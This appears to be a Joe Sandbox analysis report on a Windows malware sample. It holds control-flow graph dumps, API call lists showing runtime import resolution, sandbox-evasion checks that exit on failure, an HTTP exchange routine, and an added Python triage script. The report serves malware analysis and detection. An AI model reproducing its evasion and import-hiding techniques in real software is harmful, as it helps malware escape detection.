25794->26755 25795 101075d 25795->25794 25796 101077d lstrcpy 25795->25796 25796->25794 25798 101078f 26909 1008ca0 StrCmpCA 25798->26909 25800 101079b 25801 ff1530 8 API calls 25800->25801 25802 10107bc 25801->25802 25803 10107e5 lstrcpy 25802->25803 25804 10107ed 25802->25804 25803->25804 26927 ff60d0 80 API calls 25804->26927 25806 
10107fa 26928 10081b0 10 API calls 25806->26928 25808 1010809 25809 ff1530 8 API calls 25808->25809 25810 101082f 25809->25810 25811 1010856 lstrcpy 25810->25811 25812 101085e 25810->25812 25811->25812 26929 ff60d0 80 API calls 25812->26929 25814 101086b 26930 1007ee0 lstrlen lstrcpy StrCmpCA StrCmpCA StrCmpCA 25814->26930 25816 1010876 25817 ff1530 8 API calls 25816->25817 25818 10108a1 25817->25818 25819 10108d5 25818->25819 25820 10108c9 lstrcpy 25818->25820 26931 ff60d0 80 API calls 25819->26931 25820->25819 25822 10108db 26932 1008050 lstrlen lstrcpy StrCmpCA lstrlen lstrcpy 25822->26932 25824 10108e6 25825 ff1530 8 API calls 25824->25825 25826 10108f7 25825->25826 25827 1010926 lstrcpy 25826->25827 25828 101092e 25826->25828 25827->25828 26933 ff5640 8 API calls 25828->26933 25830 1010933 25831 ff1530 8 API calls 25830->25831 25832 101094c 25831->25832 26934 1007280 1501 API calls 25832->26934 25834 101099f 25835 ff1530 8 API calls 25834->25835 25836 10109cf 25835->25836 25837 10109f6 lstrcpy 25836->25837 25838 10109fe 25836->25838 25837->25838 26935 ff60d0 80 API calls 25838->26935 25840 1010a0b 26936 10083e0 7 API calls 25840->26936 25842 1010a18 25843 ff1530 8 API calls 25842->25843 25844 1010a29 25843->25844 26937 ff24e0 230 API calls 25844->26937 25846 1010a6b 25847 1010b40 25846->25847 25848 1010a7f 25846->25848 25850 ff1530 8 API calls 25847->25850 25849 ff1530 8 API calls 25848->25849 25851 1010aa5 25849->25851 25852 1010b59 25850->25852 25854 1010ad4 25851->25854 25855 1010acc lstrcpy 25851->25855 25853 1010b87 25852->25853 25856 1010b7f lstrcpy 25852->25856 26941 ff60d0 80 API calls 25853->26941 26938 ff60d0 80 API calls 25854->26938 25855->25854 25856->25853 25859 1010b8d 26942 100c840 70 API calls 25859->26942 25860 1010ada 26939 10085b0 47 API calls 25860->26939 25863 1010b38 25866 1010bd1 25863->25866 25869 ff1530 8 API calls 25863->25869 25864 1010ae5 25865 ff1530 8 API calls 25864->25865 25868 1010af6 25865->25868 25867 1010bfa 25866->25867 
25870 ff1530 8 API calls 25866->25870 25871 1010c23 25867->25871 25875 ff1530 8 API calls 25867->25875 26940 100d0f0 118 API calls 25868->26940 25873 1010bb9 25869->25873 25874 1010bf5 25870->25874 25877 1010c4c 25871->25877 25878 ff1530 8 API calls 25871->25878 26943 100d7b0 104 API calls 25873->26943 26945 100dfa0 149 API calls 25874->26945 25881 1010c1e 25875->25881 25879 1010c75 25877->25879 25884 ff1530 8 API calls 25877->25884 25883 1010c47 25878->25883 25885 1010c9e 25879->25885 25891 ff1530 8 API calls 25879->25891 26946 100e500 108 API calls 25881->26946 25882 1010bbe 25887 ff1530 8 API calls 25882->25887 26947 100e720 120 API calls 25883->26947 25890 1010c70 25884->25890 25888 1010cc7 25885->25888 25894 ff1530 8 API calls 25885->25894 25892 1010bcc 25887->25892 25895 1010cf0 25888->25895 25899 ff1530 8 API calls 25888->25899 26948 100e9e0 110 API calls 25890->26948 25897 1010c99 25891->25897 26944 100ecb0 100 API calls 25892->26944 25898 1010cc2 25894->25898 25900 1010d04 25895->25900 25901 1010dca 25895->25901 26949 ff7bc0 154 API calls 25897->26949 26950 100eb70 108 API calls 25898->26950 25905 1010ceb 25899->25905 25906 ff1530 8 API calls 25900->25906 25903 ff1530 8 API calls 25901->25903 25910 1010de3 25903->25910 26951 10141e0 91 API calls 25905->26951 25908 1010d2a 25906->25908 25911 1010d56 lstrcpy 25908->25911 25912 1010d5e 25908->25912 25909 1010e11 26955 ff60d0 80 API calls 25909->26955 25910->25909 25913 1010e09 lstrcpy 25910->25913 25911->25912 26952 ff60d0 80 API calls 25912->26952 25913->25909 25916 1010e17 26956 100c840 70 API calls 25916->26956 25917 1010d64 26953 10085b0 47 API calls 25917->26953 25920 1010dc2 25923 ff1530 8 API calls 25920->25923 25921 1010d6f 25922 ff1530 8 API calls 25921->25922 25924 1010d80 25922->25924 25927 1010e39 25923->25927 26954 100d0f0 118 API calls 25924->26954 25926 1010e67 26957 ff60d0 80 API calls 25926->26957 25927->25926 25928 1010e5f lstrcpy 25927->25928 25928->25926 25930 1010e74 25932 1010e95 
25930->25932 26958 1011660 12 API calls 25930->26958 25932->25610 25933->25581 25935 ff4a76 RtlAllocateHeap 25934->25935 25938 ff4ab4 VirtualProtect 25935->25938 25938->25613 25940 101182e 25939->25940 25941 1011855 lstrlen 25940->25941 25942 1011849 lstrcpy 25940->25942 25943 1011873 25941->25943 25942->25941 25944 1011885 lstrcpy lstrcat 25943->25944 25945 1011898 25943->25945 25944->25945 25946 10118c7 25945->25946 25947 10118bf lstrcpy 25945->25947 25948 10118ce lstrlen 25946->25948 25947->25946 25949 10118e6 25948->25949 25950 10118f2 lstrcpy lstrcat 25949->25950 25951 1011906 25949->25951 25950->25951 25952 1011935 25951->25952 25953 101192d lstrcpy 25951->25953 25954 101193c lstrlen 25952->25954 25953->25952 25955 1011958 25954->25955 25956 101196a lstrcpy lstrcat 25955->25956 25957 101197d 25955->25957 25956->25957 25958 10119ac 25957->25958 25959 10119a4 lstrcpy 25957->25959 25960 10119b3 lstrlen 25958->25960 25959->25958 25961 10119cb 25960->25961 25962 10119d7 lstrcpy lstrcat 25961->25962 25963 10119eb 25961->25963 25962->25963 25964 1011a1a 25963->25964 25965 1011a12 lstrcpy 25963->25965 25966 1011a21 lstrlen 25964->25966 25965->25964 25967 1011a3d 25966->25967 25968 1011a4f lstrcpy lstrcat 25967->25968 25969 1011a62 25967->25969 25968->25969 25970 1011a91 25969->25970 25971 1011a89 lstrcpy 25969->25971 25972 1011a98 lstrlen 25970->25972 25971->25970 25973 1011ab4 25972->25973 25974 1011ac6 lstrcpy lstrcat 25973->25974 25975 1011ad9 25973->25975 25974->25975 25976 1011b08 25975->25976 25977 1011b00 lstrcpy 25975->25977 25976->25729 25977->25976 25979 ff2a24 SystemTimeToFileTime SystemTimeToFileTime 25978->25979 25979->25732 25979->25734 25981 101157f 25980->25981 25982 101159f lstrcpy 25981->25982 25983 10115a7 25981->25983 25982->25983 25984 10115d7 lstrcpy 25983->25984 25985 10115df 25983->25985 25984->25985 25986 101160f lstrcpy 25985->25986 25987 1011617 25985->25987 25986->25987 25988 1010155 lstrlen 25987->25988 25989 1011647 lstrcpy 25987->25989 
25988->25750 25989->25988 25991 ff4a60 2 API calls 25990->25991 25992 ff2e82 25991->25992 25993 ff4a60 2 API calls 25992->25993 25994 ff2ea0 25993->25994 25995 ff4a60 2 API calls 25994->25995 25996 ff2eb6 25995->25996 25997 ff4a60 2 API calls 25996->25997 25998 ff2ecb 25997->25998 25999 ff4a60 2 API calls 25998->25999 26000 ff2eec 25999->26000 26001 ff4a60 2 API calls 26000->26001 26002 ff2f01 26001->26002 26003 ff4a60 2 API calls 26002->26003 26004 ff2f19 26003->26004 26005 ff4a60 2 API calls 26004->26005 26006 ff2f3a 26005->26006 26007 ff4a60 2 API calls 26006->26007 26008 ff2f4f 26007->26008 26009 ff4a60 2 API calls 26008->26009 26010 ff2f65 26009->26010 26011 ff4a60 2 API calls 26010->26011 26012 ff2f7b 26011->26012 26013 ff4a60 2 API calls 26012->26013 26014 ff2f91 26013->26014 26015 ff4a60 2 API calls 26014->26015 26016 ff2faa 26015->26016 26017 ff4a60 2 API calls 26016->26017 26018 ff2fc0 26017->26018 26019 ff4a60 2 API calls 26018->26019 26020 ff2fd6 26019->26020 26021 ff4a60 2 API calls 26020->26021 26022 ff2fec 26021->26022 26023 ff4a60 2 API calls 26022->26023 26024 ff3002 26023->26024 26025 ff4a60 2 API calls 26024->26025 26026 ff3018 26025->26026 26027 ff4a60 2 API calls 26026->26027 26028 ff3031 26027->26028 26029 ff4a60 2 API calls 26028->26029 26030 ff3047 26029->26030 26031 ff4a60 2 API calls 26030->26031 26032 ff305d 26031->26032 26033 ff4a60 2 API calls 26032->26033 26034 ff3073 26033->26034 26035 ff4a60 2 API calls 26034->26035 26036 ff3089 26035->26036 26037 ff4a60 2 API calls 26036->26037 26038 ff309f 26037->26038 26039 ff4a60 2 API calls 26038->26039 26040 ff30b8 26039->26040 26041 ff4a60 2 API calls 26040->26041 26042 ff30ce 26041->26042 26043 ff4a60 2 API calls 26042->26043 26044 ff30e4 26043->26044 26045 ff4a60 2 API calls 26044->26045 26046 ff30fa 26045->26046 26047 ff4a60 2 API calls 26046->26047 26048 ff3110 26047->26048 26049 ff4a60 2 API calls 26048->26049 26050 ff3126 26049->26050 26051 ff4a60 2 API calls 26050->26051 26052 ff313f 
26051->26052 26053 ff4a60 2 API calls 26052->26053 26054 ff3155 26053->26054 26055 ff4a60 2 API calls 26054->26055 26056 ff316b 26055->26056 26057 ff4a60 2 API calls 26056->26057 26058 ff3181 26057->26058 26059 ff4a60 2 API calls 26058->26059 26060 ff3197 26059->26060 26061 ff4a60 2 API calls 26060->26061 26062 ff31ad 26061->26062 26063 ff4a60 2 API calls 26062->26063 26064 ff31c6 26063->26064 26065 ff4a60 2 API calls 26064->26065 26066 ff31dc 26065->26066 26067 ff4a60 2 API calls 26066->26067 26068 ff31f2 26067->26068 26069 ff4a60 2 API calls 26068->26069 26070 ff3208 26069->26070 26071 ff4a60 2 API calls 26070->26071 26072 ff321e 26071->26072 26073 ff4a60 2 API calls 26072->26073 26074 ff3234 26073->26074 26075 ff4a60 2 API calls 26074->26075 26076 ff324d 26075->26076 26077 ff4a60 2 API calls 26076->26077 26078 ff3263 26077->26078 26079 ff4a60 2 API calls 26078->26079 26080 ff3279 26079->26080 26081 ff4a60 2 API calls 26080->26081 26082 ff328f 26081->26082 26083 ff4a60 2 API calls 26082->26083 26084 ff32a5 26083->26084 26085 ff4a60 2 API calls 26084->26085 26086 ff32bb 26085->26086 26087 ff4a60 2 API calls 26086->26087 26088 ff32d4 26087->26088 26089 ff4a60 2 API calls 26088->26089 26090 ff32ea 26089->26090 26091 ff4a60 2 API calls 26090->26091 26092 ff3300 26091->26092 26093 ff4a60 2 API calls 26092->26093 26094 ff3316 26093->26094 26095 ff4a60 2 API calls 26094->26095 26096 ff332c 26095->26096 26097 ff4a60 2 API calls 26096->26097 26098 ff3342 26097->26098 26099 ff4a60 2 API calls 26098->26099 26100 ff335b 26099->26100 26101 ff4a60 2 API calls 26100->26101 26102 ff3371 26101->26102 26103 ff4a60 2 API calls 26102->26103 26104 ff3387 26103->26104 26105 ff4a60 2 API calls 26104->26105 26106 ff339d 26105->26106 26107 ff4a60 2 API calls 26106->26107 26108 ff33b3 26107->26108 26109 ff4a60 2 API calls 26108->26109 26110 ff33c9 26109->26110 26111 ff4a60 2 API calls 26110->26111 26112 ff33e2 26111->26112 26113 ff4a60 2 API calls 26112->26113 26114 ff33f8 26113->26114 
                                control_flow_graph (text rendering of the graph image; only the recoverable call sequence is kept): a long chain of blocks from ff340e to ff4a4a, each calling the routine at ff4a60 (2 API calls); 10166e0 resolves imports through repeated groups of GetProcAddress calls; ff1530/ff1610 and 100f1b0 build strings with lstrcpy/lstrlen and compare them with StrCmpCA (with a Sleep at 100fd60 and calls into 100ee90 and 100efb0); 101278c calls GetVolumeInformationA, GetProcessHeap, RtlAllocateHeap and wsprintfA; ff4c70 performs the network exchange: three ??2@YAPAXI allocations and InternetCrackUrlA (ff4bc0), InternetOpenA and StrCmpCA, GetSystemTime (1013e70), InternetConnectA, HttpOpenRequestA, a request assembled with the lstrlen/lstrcpy/lstrcat helpers at 1017280, 10172c0 and 1017310, HttpSendRequestA, an InternetReadFile loop, InternetCloseHandle, then CryptStringToBinaryA with LocalAlloc/LocalFree; 1008cc6 is an ExitProcess path reached from a block of StrCmpCA/lstrlen checks at 1008ccd.

                                Control-flow Graph
                                control_flow_graph (summary of the rendered graph): 1016390-10163bd GetPEB; 10163c3-10165be call 10162f0 and GetProcAddress * 20; 10165c3-1016623 LoadLibraryA * 5; 1016625-10166d2 seven further GetProcAddress calls (1, 2, 1, 1, 2) each behind a conditional check; exit block 10166d7-10166da
                                APIs
                                • GetProcAddress.KERNEL32(77190000,00D616C0), ref: 010163E9
                                • GetProcAddress.KERNEL32(77190000,00D616F0), ref: 01016402
                                • GetProcAddress.KERNEL32(77190000,00D61480), ref: 0101641A
                                • GetProcAddress.KERNEL32(77190000,00D61498), ref: 01016432
                                • GetProcAddress.KERNEL32(77190000,00D68B80), ref: 0101644B
                                • GetProcAddress.KERNEL32(77190000,00D56118), ref: 01016463
                                • GetProcAddress.KERNEL32(77190000,00D56218), ref: 0101647B
                                • GetProcAddress.KERNEL32(77190000,00D614B0), ref: 01016494
                                • GetProcAddress.KERNEL32(77190000,00D614F8), ref: 010164AC
                                • GetProcAddress.KERNEL32(77190000,00D61510), ref: 010164C4
                                • GetProcAddress.KERNEL32(77190000,00D61528), ref: 010164DD
                                • GetProcAddress.KERNEL32(77190000,00D56138), ref: 010164F5
                                • GetProcAddress.KERNEL32(77190000,00D61540), ref: 0101650D
                                • GetProcAddress.KERNEL32(77190000,00D61558), ref: 01016526
                                • GetProcAddress.KERNEL32(77190000,00D560B8), ref: 0101653E
                                • GetProcAddress.KERNEL32(77190000,00D61570), ref: 01016556
                                • GetProcAddress.KERNEL32(77190000,00D615D0), ref: 0101656F
                                • GetProcAddress.KERNEL32(77190000,00D56298), ref: 01016587
                                • GetProcAddress.KERNEL32(77190000,00D61750), ref: 0101659F
                                • GetProcAddress.KERNEL32(77190000,00D562D8), ref: 010165B8
                                • LoadLibraryA.KERNEL32(00D61768,?,?,?,01011C03), ref: 010165C9
                                • LoadLibraryA.KERNEL32(00D617E0,?,?,?,01011C03), ref: 010165DB
                                • LoadLibraryA.KERNEL32(00D617F8,?,?,?,01011C03), ref: 010165ED
                                • LoadLibraryA.KERNEL32(00D61780,?,?,?,01011C03), ref: 010165FE
                                • LoadLibraryA.KERNEL32(00D61798,?,?,?,01011C03), ref: 01016610
                                • GetProcAddress.KERNEL32(76850000,00D617C8), ref: 0101662D
                                • GetProcAddress.KERNEL32(77040000,00D617B0), ref: 01016649
                                • GetProcAddress.KERNEL32(77040000,00D61810), ref: 01016661
                                • GetProcAddress.KERNEL32(75A10000,00D68EB8), ref: 0101667D
                                • GetProcAddress.KERNEL32(75690000,00D563B8), ref: 01016699
                                • GetProcAddress.KERNEL32(776F0000,00D68A80), ref: 010166B5
                                • GetProcAddress.KERNEL32(776F0000,NtQueryInformationProcess), ref: 010166CC
                                Strings
                                • NtQueryInformationProcess, xrefs: 010166C1
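                                The API list above is the evidence behind the "Extensive use of GetProcAddress" signature: 20 GetProcAddress calls against the kernel32 base 77190000 at call sites that precede the first LoadLibraryA (and so against a base obtained without it, consistent with the GetPEB block in the graph), then five LoadLibraryA calls and seven GetProcAddress calls against the newly returned bases, with only one export name (NtQueryInformationProcess) visible as a string rather than a pointer. The following Python script is an added triage example, not part of the Joe Sandbox report or of the sample; it parses lines in the shape of the "APIs" list (a constructed subset of the lines above is embedded) and summarizes the resolution pattern. The threshold value and the function names are assumptions.

```python
import re
from collections import Counter

# Constructed subset of the report's "APIs" list above (same line shape, not the full list).
SAMPLE_API_LINES = """\
• GetProcAddress.KERNEL32(77190000,00D616C0), ref: 010163E9
• GetProcAddress.KERNEL32(77190000,00D616F0), ref: 01016402
• GetProcAddress.KERNEL32(77190000,00D61480), ref: 0101641A
• GetProcAddress.KERNEL32(77190000,00D61498), ref: 01016432
• GetProcAddress.KERNEL32(77190000,00D68B80), ref: 0101644B
• LoadLibraryA.KERNEL32(00D61768,?,?,?,01011C03), ref: 010165C9
• LoadLibraryA.KERNEL32(00D617E0,?,?,?,01011C03), ref: 010165DB
• GetProcAddress.KERNEL32(76850000,00D617C8), ref: 0101662D
• GetProcAddress.KERNEL32(776F0000,00D68A80), ref: 010166B5
• GetProcAddress.KERNEL32(776F0000,NtQueryInformationProcess), ref: 010166CC
"""

# One "APIs" line: <api>.<module>(<args>), ref: <call-site address>
API_LINE = re.compile(
    r"^\s*•?\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
HEX32 = re.compile(r"[0-9A-Fa-f]{8}")


def parse_api_lines(text):
    """Parse report-style API lines into dicts; lines that do not match are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        calls.append({
            "api": m.group("api"),
            "module": m.group("module"),
            "args": [a.strip() for a in m.group("args").split(",")],
            "ref": int(m.group("ref"), 16),  # call-site address, used for ordering
        })
    return calls


def summarize_resolution(calls):
    """Count GetProcAddress calls per module base and collect export names the sandbox could read."""
    by_base = Counter()
    named = []
    for c in calls:
        if c["api"] != "GetProcAddress" or len(c["args"]) < 2:
            continue
        by_base[c["args"][0]] += 1
        name = c["args"][1]
        # A second argument that is not an 8-hex-digit pointer is a plaintext export name
        if not HEX32.fullmatch(name):
            named.append(name)
    loads = sum(1 for c in calls if c["api"] == "LoadLibraryA")
    return {"getprocaddress_by_base": dict(by_base), "loadlibrary_calls": loads, "named_exports": named}


def bases_used_before_first_loadlibrary(calls):
    """Module bases handed to GetProcAddress before the first LoadLibraryA, in call-site order.
    A base used here was obtained without LoadLibrary, e.g. a module located through the PEB."""
    seen = []
    for c in sorted(calls, key=lambda c: c["ref"]):
        if c["api"] == "LoadLibraryA":
            break
        if c["api"] == "GetProcAddress" and c["args"] and c["args"][0] not in seen:
            seen.append(c["args"][0])
    return seen


def flag_dynamic_import_resolution(summary, threshold=5):
    """Heuristic (threshold is an assumption): bulk GetProcAddress against one base plus LoadLibraryA
    indicates an import table built at runtime instead of a normal static import directory."""
    bulk = any(n >= threshold for n in summary["getprocaddress_by_base"].values())
    return bulk and summary["loadlibrary_calls"] > 0


if __name__ == "__main__":
    calls = parse_api_lines(SAMPLE_API_LINES)
    summary = summarize_resolution(calls)
    print(summary)
    print("bases resolved without LoadLibraryA:", bases_used_before_first_loadlibrary(calls))
    print("dynamic import resolution:", flag_dynamic_import_resolution(summary))
```

                                On the full list from the report the count for base 77190000 is 20, so the same heuristic fires with a much wider margin; the pointer-only second arguments mean the export names were built or decoded in memory, which is why the only name the sandbox could print is NtQueryInformationProcess.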
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: NtQueryInformationProcess
                                • API String ID: 2238633743-2781105232
                                • Opcode ID: da128f87a62da878c00e82e056e6efcb2e13064c38d0fbf1888c8751b4d64234
                                • Instruction ID: 9818fc884441093b48008e8c487773de1389060a47a78675677cda1da5281414
                                • Opcode Fuzzy Hash: da128f87a62da878c00e82e056e6efcb2e13064c38d0fbf1888c8751b4d64234
                                • Instruction Fuzzy Hash: 35A150B5A11224BFDB74DF64F84CE2E37F9B788648B00A519E9559331CD778AA80CF60

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                 control_flow_graph 1802 1011bf0-1011c0b call ff2a90 call 1016390 1807 1011c1a-1011c27 call ff2930 1802->1807 1808 1011c0d 1802->1808 1812 1011c35-1011c63 1807->1812 1813 1011c29-1011c2f lstrcpy 1807->1813 1809 1011c10-1011c18 1808->1809 1809->1807 1809->1809 1817 1011c65-1011c67 ExitProcess 1812->1817 1818 1011c6d-1011c7b GetSystemInfo 1812->1818 1813->1812 1819 1011c85-1011ca0 call ff1030 call ff10c0 GetUserDefaultLangID 1818->1819 1820 1011c7d-1011c7f ExitProcess 1818->1820 1825 1011ca2-1011ca9 1819->1825 1826 1011cb8-1011cca call 1012ad0 call 1013e10 1819->1826 1825->1826 1827 1011cb0-1011cb2 ExitProcess 1825->1827 1832 1011ce7-1011d06 lstrlen call ff2930 1826->1832 1833 1011ccc-1011cde call 1012a40 call 1013e10 1826->1833 1839 1011d23-1011d40 lstrlen call ff2930 1832->1839 1840 1011d08-1011d0d 1832->1840 1833->1832 1844 1011ce0-1011ce1 ExitProcess 1833->1844 1847 1011d42-1011d44 1839->1847 1848 1011d5a-1011d7b call 1012ad0 lstrlen call ff2930 1839->1848 1840->1839 1842 1011d0f-1011d11 1840->1842 1842->1839 1845 1011d13-1011d1d lstrcpy lstrcat 1842->1845 1845->1839 1847->1848 1850 1011d46-1011d54 lstrcpy lstrcat 1847->1850 1854 1011d9a-1011db4 lstrlen call ff2930 1848->1854 1855 1011d7d-1011d7f 1848->1855 1850->1848 1860 1011db6-1011db8 1854->1860 1861 1011dce-1011deb call 1012a40 lstrlen call ff2930 1854->1861 1855->1854 1856 1011d81-1011d85 1855->1856 1856->1854 1858 1011d87-1011d94 lstrcpy lstrcat 1856->1858 1858->1854 1860->1861 1862 1011dba-1011dc8 lstrcpy lstrcat 1860->1862 1867 1011e0a-1011e0f 1861->1867 1868 1011ded-1011def 1861->1868 1862->1861 1870 1011e11 call ff2a20 1867->1870 1871 1011e16-1011e22 call ff2930 1867->1871 1868->1867 1869 1011df1-1011df5 1868->1869 1869->1867 1872 1011df7-1011e04 lstrcpy lstrcat 1869->1872 1870->1871 1876 1011e30-1011e66 call ff2a20 * 5 OpenEventA 1871->1876 1877 1011e24-1011e26 1871->1877 1872->1867 1889 1011e68-1011e8a CloseHandle Sleep OpenEventA 1876->1889 1890 1011e8c-1011ea0 CreateEventA call 1011b20 call 100ffd0 1876->1890 1877->1876 1878 1011e28-1011e2a lstrcpy 1877->1878 1878->1876 1889->1889 1889->1890 1894 1011ea5-1011eae CloseHandle ExitProcess 1890->1894
                                APIs
                                  • Part of subcall function 01016390: GetProcAddress.KERNEL32(77190000,00D616C0), ref: 010163E9
                                  • Part of subcall function 01016390: GetProcAddress.KERNEL32(77190000,00D616F0), ref: 01016402
                                  • Part of subcall function 01016390: GetProcAddress.KERNEL32(77190000,00D61480), ref: 0101641A
                                  • Part of subcall function 01016390: GetProcAddress.KERNEL32(77190000,00D61498), ref: 01016432
                                  • Part of subcall function 01016390: GetProcAddress.KERNEL32(77190000,00D68B80), ref: 0101644B
                                  • Part of subcall function 01016390: GetProcAddress.KERNEL32(77190000,00D56118), ref: 01016463
                                  • Part of subcall function 01016390: GetProcAddress.KERNEL32(77190000,00D56218), ref: 0101647B
                                  • Part of subcall function 01016390: GetProcAddress.KERNEL32(77190000,00D614B0), ref: 01016494
                                  • Part of subcall function 01016390: GetProcAddress.KERNEL32(77190000,00D614F8), ref: 010164AC
                                  • Part of subcall function 01016390: GetProcAddress.KERNEL32(77190000,00D61510), ref: 010164C4
                                  • Part of subcall function 01016390: GetProcAddress.KERNEL32(77190000,00D61528), ref: 010164DD
                                  • Part of subcall function 01016390: GetProcAddress.KERNEL32(77190000,00D56138), ref: 010164F5
                                  • Part of subcall function 01016390: GetProcAddress.KERNEL32(77190000,00D61540), ref: 0101650D
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 01011C2F
                                • ExitProcess.KERNEL32 ref: 01011C67
                                • GetSystemInfo.KERNEL32(?), ref: 01011C71
                                • ExitProcess.KERNEL32 ref: 01011C7F
                                  • Part of subcall function 00FF1030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00FF1046
                                  • Part of subcall function 00FF1030: VirtualAllocExNuma.KERNEL32(00000000), ref: 00FF104D
                                  • Part of subcall function 00FF1030: ExitProcess.KERNEL32 ref: 00FF1058
                                  • Part of subcall function 00FF10C0: GlobalMemoryStatusEx.KERNEL32 ref: 00FF10EA
                                  • Part of subcall function 00FF10C0: ExitProcess.KERNEL32 ref: 00FF1114
                                • GetUserDefaultLangID.KERNEL32 ref: 01011C8F
                                • ExitProcess.KERNEL32 ref: 01011CB2
                                • ExitProcess.KERNEL32 ref: 01011CE1
                                • lstrlen.KERNEL32(00D68B50), ref: 01011CEE
                                • lstrcpy.KERNEL32(00000000,?), ref: 01011D15
                                • lstrcat.KERNEL32(00000000,00D68B50), ref: 01011D1D
                                • lstrlen.KERNEL32(01024B98), ref: 01011D28
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01011D48
                                • lstrcat.KERNEL32(00000000,01024B98), ref: 01011D54
                                • lstrlen.KERNEL32(00000000), ref: 01011D63
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01011D89
                                • lstrcat.KERNEL32(00000000,00000000), ref: 01011D94
                                • lstrlen.KERNEL32(01024B98), ref: 01011D9F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01011DBC
                                • lstrcat.KERNEL32(00000000,01024B98), ref: 01011DC8
                                • lstrlen.KERNEL32(00000000), ref: 01011DD7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01011DF9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 01011E04
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                 • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$Process$Exitlstrcpy$lstrcatlstrlen$AllocCurrentDefaultGlobalInfoLangMemoryNumaStatusSystemUserVirtual
                                • String ID:
                                • API String ID: 3366406952-0
                                • Opcode ID: 0bcc9415a094a75fa78311b5640aebe13fda190975b16cce9283b5a5381a4c49
                                • Instruction ID: 4fae4492812beecc735f849e20f5b947d9d9e861b194d4c36100edf208ee0922
                                • Opcode Fuzzy Hash: 0bcc9415a094a75fa78311b5640aebe13fda190975b16cce9283b5a5381a4c49
                                • Instruction Fuzzy Hash: 70719F3150022AABEB71BFB4EC8DB6E3BF9AF04705F441058F74696199DB7CD9019B60

                                Control-flow Graph

                                • Executed
                                • Not Executed
